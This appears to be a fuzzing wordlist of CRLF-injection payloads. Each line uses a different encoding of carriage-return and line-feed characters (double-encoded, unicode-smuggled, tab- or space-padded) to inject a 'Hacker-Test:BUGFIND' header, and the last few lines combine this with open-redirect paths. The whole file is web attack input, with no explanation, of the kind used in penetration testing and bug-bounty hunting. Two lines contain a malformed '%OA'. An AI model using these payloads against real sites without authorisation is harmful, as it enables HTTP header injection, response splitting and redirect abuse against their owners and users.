%0AHacker-Test:BUGFIND
%0A%20Hacker-Test:BUGFIND
%20%0AHacker-Test:BUGFIND
%23%OAHacker-Test:BUGFIND
%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
%E5%98%8A%E5%98%8D%0AHacker-Test:BUGFIND
%3F%0AHacker-Test:BUGFIND
crlf%0AHacker-Test:BUGFIND
crlf%0A%20Hacker-Test:BUGFIND
crlf%20%0AHacker-Test:BUGFIND
crlf%23%OAHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8D%0AHacker-Test:BUGFIND
crlf%3F%0AHacker-Test:BUGFIND
%0DHacker-Test:BUGFIND
%0D%20Hacker-Test:BUGFIND
%20%0DHacker-Test:BUGFIND
%23%0DHacker-Test:BUGFIND
%23%0AHacker-Test:BUGFIND
%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
%E5%98%8A%E5%98%8D%0DHacker-Test:BUGFIND
%3F%0DHacker-Test:BUGFIND
crlf%0DHacker-Test:BUGFIND
crlf%0D%20Hacker-Test:BUGFIND
crlf%20%0DHacker-Test:BUGFIND
crlf%23%0DHacker-Test:BUGFIND
crlf%23%0AHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8D%0DHacker-Test:BUGFIND
crlf%3F%0DHacker-Test:BUGFIND
%0D%0AHacker-Test:BUGFIND
%0D%0A%20Hacker-Test:BUGFIND
%20%0D%0AHacker-Test:BUGFIND
%23%0D%0AHacker-Test:BUGFIND
\r\nHacker-Test:BUGFIND
 \r\n Hacker-Test:BUGFIND
\r\n Hacker-Test:BUGFIND
%5cr%5cnHacker-Test:BUGFIND
%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
%E5%98%8A%E5%98%8D%0D%0AHacker-Test:BUGFIND
%3F%0D%0AHacker-Test:BUGFIND
crlf%0D%0AHacker-Test:BUGFIND
crlf%0D%0A%20Hacker-Test:BUGFIND
crlf%20%0D%0AHacker-Test:BUGFIND
crlf%23%0D%0AHacker-Test:BUGFIND
crlf\r\nHacker-Test:BUGFIND
crlf%5cr%5cnHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8DHacker-Test:BUGFIND
crlf%E5%98%8A%E5%98%8D%0D%0AHacker-Test:BUGFIND
crlf%3F%0D%0AHacker-Test:BUGFIND
%0D%0A%09Hacker-Test:BUGFIND
crlf%0D%0A%09Hacker-Test:BUGFIND
%250AHacker-Test:BUGFIND
%25250AHacker-Test:BUGFIND
%%0A0AHacker-Test:BUGFIND
%25%30AHacker-Test:BUGFIND
%25%30%61Hacker-Test:BUGFIND
%u000AHacker-Test:BUGFIND
//www.google.com/%2F%2E%2E%0D%0AHacker-Test:BUGFIND
/www.google.com/%2E%2E%2F%0D%0AHacker-Test:BUGFIND
/google.com/%2F..%0D%0AHacker-Test:BUGFIND